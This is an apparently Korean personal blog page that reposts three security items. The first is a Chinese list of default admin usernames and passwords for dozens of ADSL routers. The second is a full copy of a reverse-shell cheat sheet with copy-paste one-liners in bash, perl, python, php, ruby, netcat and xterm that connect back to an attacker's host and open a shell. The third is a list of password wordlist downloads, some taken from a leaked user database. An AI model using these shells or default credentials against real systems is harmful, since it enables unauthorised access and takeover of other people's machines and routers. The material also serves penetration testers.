用户名:anonymous 密码:12345
用户名:admin 密码:admin
用户名:admin 密码:1234
用户名:root 密码:root
用户名:user 密码:user

用户名:adsl 密码:adsl831
用户名:guest 密码:guest
友讯D-link DI504 DI604
用户名:admin 没有密码
QL1880 IP地址192.168.1.1,用户名:root,密码:root 全向QL1688
2、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin
3、合勤zyxel 642 在运行输入telnet 密码1234
4、Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root
5、神州数码6010RA,在IE输入192.168.1.1 用户名为ADSL,密码为ADSL1234

7、伊泰克:IP: 用户名:supervisor 密码:12345
8、华硕IP: 用户名:adsl 密码:adsl1234
9、阿尔卡特 一般没有密码
10、同维DSL699E 用户名:ROOT 密码:ROOT
11、大亚DB102 用户名:admin 密码:dare
12、WST的RT1080 username:root password:root
13、WST的ART18CX username:admin password:conexant
14、实达V3.2 root root V5.4 root grouter
15、泛德 admin conexant
16、东信Ea700用户名:空 密码:password
17、broadmax的hsa300a username:broadmax
18、长虹ch-500E username:root password:root
19、重庆普天CP ADSL03 username:root password:root
20、台湾突破EA110 RS232:38400 usernameSL pswSL
21、etek-td的ADSL_T07L006.0 User Name: supervisor
Password: 12345 忘记密码的解决办法:
22、GVC的DSL-802E/R3A username:admin
password:epicrouter username:user
23、科迈易通km300A-1 username: password:password
username:root password:root 科迈易通km300A-A
username:root or admin
24、sunrise的SR-DSL-AE username:admin password:0000
sunrise的DSL-802E_R3A username:admin
password:epicrouter username:user
25、UTStar的ut-300R username:root or admin

'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

[펌] 常见区段 (일반섹션? 섹션 정보)  (4) 2011.12.06
중국어 번역. RAT  (0) 2011.12.06
[펌]Reverse Shell Cheat Sheet  (0) 2011.09.28
Compilation of wordlist downloads  (0) 2011.02.10
윈도우 DLL  (0) 2011.02.09

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.


Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/ 0>&1


Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here.


This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.


ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f


One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you ( on TCP port 6001.

xterm -display

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Further Reading

Also check out Bernardo’s Reverse Shell One-Liners. He has some alternative approaches and doesn’t rely on /bin/sh for his Ruby reverse shell.

There’s a reverse shell written in gawk over here. Gawk is not something that I’ve ever used myself. However, it seems to get installed by default quite often, so is exactly the sort of language pentesters might want to use for reverse shells.

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Posted in Shells

출처 : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


'작업공간 > 기본적인 삽질 & 기록' 카테고리의 다른 글

중국어 번역. RAT  (0) 2011.12.06
部分ADSL路由器默认帐号密码  (0) 2011.12.05
Compilation of wordlist downloads  (0) 2011.02.10
윈도우 DLL  (0) 2011.02.09
리눅스 동적 라이브러리 분석  (0) 2011.01.27

펌 : Compilation of wordlist downloads

Props to hashcrack.blogspot.com for compiling the most comprehensive wordlist downloads on the web. Copying links here just in case blogspot ever blows up. Additionally head over to skullsecurity.org they have some specialized wordlists from various sources including the hacked RockYou database and a skim of Facebook names/usernames for a total of 14,488,929 distinct passwords to be exact, collected from 32,943,045 users.

Leetupload-Word Lists
Offensive-Security WPA Rainbow Tables Password List

Passwords: to0l-base, zmetex, mrdel2000






Pass: http://forums.remote-exploit.org/

Pass: http://forums.remote-exploit.org/


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